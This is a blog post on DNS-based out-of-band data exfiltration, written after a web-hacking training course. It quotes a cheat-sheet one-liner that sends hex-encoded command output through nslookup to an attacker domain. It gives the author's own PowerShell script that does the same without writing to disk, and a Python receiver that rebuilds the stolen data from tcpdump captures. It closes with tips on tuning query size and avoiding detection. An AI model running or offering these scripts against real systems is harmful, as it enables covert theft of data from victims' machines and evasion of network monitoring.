Last week, I attended the NotSoSecure Advanced Web Hacking training. While there were plenty of interesting topics taught, one that caught my attention was Out-of-Band (OOB) Data Exfiltration using DNS.

Back in 2018, NotSoSecure published an Out of Band Exploitation (OOB) CheatSheet. In that document, they cover methods by which you can exfiltrate data. One of these uses files written to disk and multiple DNS queries to send large chunks of data.

cmd /v /c "ipconfig > output && certutil -encodehex -f output output.hex 4 && powershell $text=Get-Content output.hex;$subdomain=$text.replace(' ','');$j=11111;foreach($i in $subdomain){ $final=$j.tostring()+'.'+$i+'.file.oob.dnsattacker.com';$j += 1; nslookup $final }"
# Sending file in HEX

The idea here is that the command's output is written to a file, that file is hex encoded with certutil, and the hex is then sent in bite-sized pieces, one subdomain label per query, to a DNS server the attacker controls. They also provide a tcpdump command to capture the queries on that server and a command to reconstruct the data into its original format.

I thought that this was great, but I disliked having to write files to disk, and since PowerShell was already being used, I figured I could replace the entire process with a chunk of PowerShell and remove my reliance on knowing where I had write access. The end result was the following script:

$exfil_domain = '.oob.a.c0ffee.ca'
# Run the command and flatten its output lines into one newline-separated string
$cmd = ipconfig
$cmd = $cmd -join "`n"
# Hex encode every character as two uppercase hex digits into one long string.
# (Assumes ASCII output; a character above 0xFF would yield more than two digits.)
$subdomain = ''
$cmd.ToCharArray() | ForEach-Object { $char = [System.String]::Format("{0:X2}", [System.Convert]::ToUInt32($_))
    $subdomain += $char }
# Send 32 hex characters (16 bytes) per query, prefixed with a sequence number
# so the receiver can put the chunks back in order
$id = 11111
for ($i = 0; $i -lt $subdomain.Length; $i += 32) {
    try {
        $final = $id.ToString() + '.' + $subdomain.SubString($i, 32) + $exfil_domain
    }
    catch [ArgumentOutOfRangeException] {
        # The last chunk is shorter than 32 characters
        $final = $id.ToString() + '.' + $subdomain.SubString($i) + $exfil_domain
    }
    # Counter and lookup follow the same pattern as the cheat sheet one-liner
    $id += 1
    nslookup $final
}
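To round out the technique, here is the receiving side, written as an added example in Python; it is not code from the post or from the NotSoSecure cheat sheet. It mirrors the script's encoding (uppercase hex, 32 hex characters per label, a sequence number starting at 11111, the `oob.a.c0ffee.ca` suffix) so a round trip can be tested offline, then rebuilds the original bytes from query names as they would appear in tcpdump output. The tcpdump lines are constructed, not a real capture, and the code handles what a real capture throws at you: out-of-order arrival, duplicate queries from resolver retries, unrelated lookups mixed in, and a gap in the sequence.

```python
import re
from typing import Dict, Iterable, List

# Parameters mirror the PowerShell sender: suffix, 32 hex characters (16 bytes)
# per label and a sequence counter starting at 11111.
EXFIL_DOMAIN = "oob.a.c0ffee.ca"
CHUNK = 32
SEQ_START = 11111


def encode_queries(data: bytes, domain: str = EXFIL_DOMAIN,
                   chunk: int = CHUNK, seq_start: int = SEQ_START) -> List[str]:
    """Sender side: hex-encode the data and split it into sequence-numbered query names."""
    hexdata = data.hex().upper()          # same digits as "{0:X2}" per byte
    names = []
    for seq, start in enumerate(range(0, len(hexdata), chunk), start=seq_start):
        names.append(f"{seq}.{hexdata[start:start + chunk]}.{domain}")
    return names


# A tcpdump line for a DNS query ends in "... 2834+ A? <name>. (76)"; pull out <name>.
TCPDUMP_QNAME_RE = re.compile(r"\s(?:A|AAAA|TXT|ANY)\?\s+(\S+?)\.?\s+\(\d+\)")


def qnames_from_tcpdump(lines: Iterable[str]) -> List[str]:
    """Extract the queried names from tcpdump -l -n output lines."""
    names = []
    for line in lines:
        m = TCPDUMP_QNAME_RE.search(line)
        if m:
            names.append(m.group(1))
    return names


def reassemble(qnames: Iterable[str], domain: str = EXFIL_DOMAIN) -> bytes:
    """Receiver side: keep only queries for our zone, order them by sequence number,
    drop retransmitted duplicates, fail loudly on gaps, and decode the hex."""
    pattern = re.compile(rf"^(\d+)\.([0-9A-Fa-f]+)\.{re.escape(domain)}\.?$")
    chunks: Dict[int, str] = {}
    for name in qnames:
        m = pattern.match(name)
        if not m:
            continue                        # unrelated lookup
        seq, hexpart = int(m.group(1)), m.group(2)
        chunks.setdefault(seq, hexpart)     # resolver retries repeat a query; keep the first copy
    if not chunks:
        return b""
    seqs = sorted(chunks)
    missing = [s for s in range(seqs[0], seqs[-1] + 1) if s not in chunks]
    if missing:
        raise ValueError(f"missing chunks: {missing}")
    return bytes.fromhex("".join(chunks[s] for s in seqs))


# Constructed tcpdump output (not a real capture): chunk 2 arrives before chunk 1,
# chunk 1 is then repeated by a resolver retry, and an unrelated lookup is mixed in.
SAMPLE_TCPDUMP = [
    "14:02:11.104433 IP 192.0.2.10.51515 > 192.0.2.53.53: 2834+ A? 11112.6775726174696F6E.oob.a.c0ffee.ca. (56)",
    "14:02:11.104871 IP 192.0.2.10.51516 > 192.0.2.53.53: 2835+ A? 11111.57696E646F777320495020436F6E6669.oob.a.c0ffee.ca. (72)",
    "14:02:11.231900 IP 192.0.2.77.49201 > 192.0.2.53.53: 1201+ A? wpad.corp.example. (35)",
    "14:02:12.105102 IP 192.0.2.10.51516 > 192.0.2.53.53: 2835+ A? 11111.57696E646F777320495020436F6E6669.oob.a.c0ffee.ca. (72)",
]

if __name__ == "__main__":
    recovered = reassemble(qnames_from_tcpdump(SAMPLE_TCPDUMP))
    print(recovered.decode())               # Windows IP Configuration
```

Two practical points fall out of this. A 32-character label sits well inside the 63-octet DNS label limit, so the sender could push 63 hex characters per query and roughly halve the number of lookups at the cost of longer, more conspicuous names. And the same regularities that make reassembly easy (long hex-only labels, a monotonically increasing counter, a burst of lookups for one zone) are exactly what a defender watching DNS logs keys on, so this is a technique to use sparingly rather than for bulk transfer.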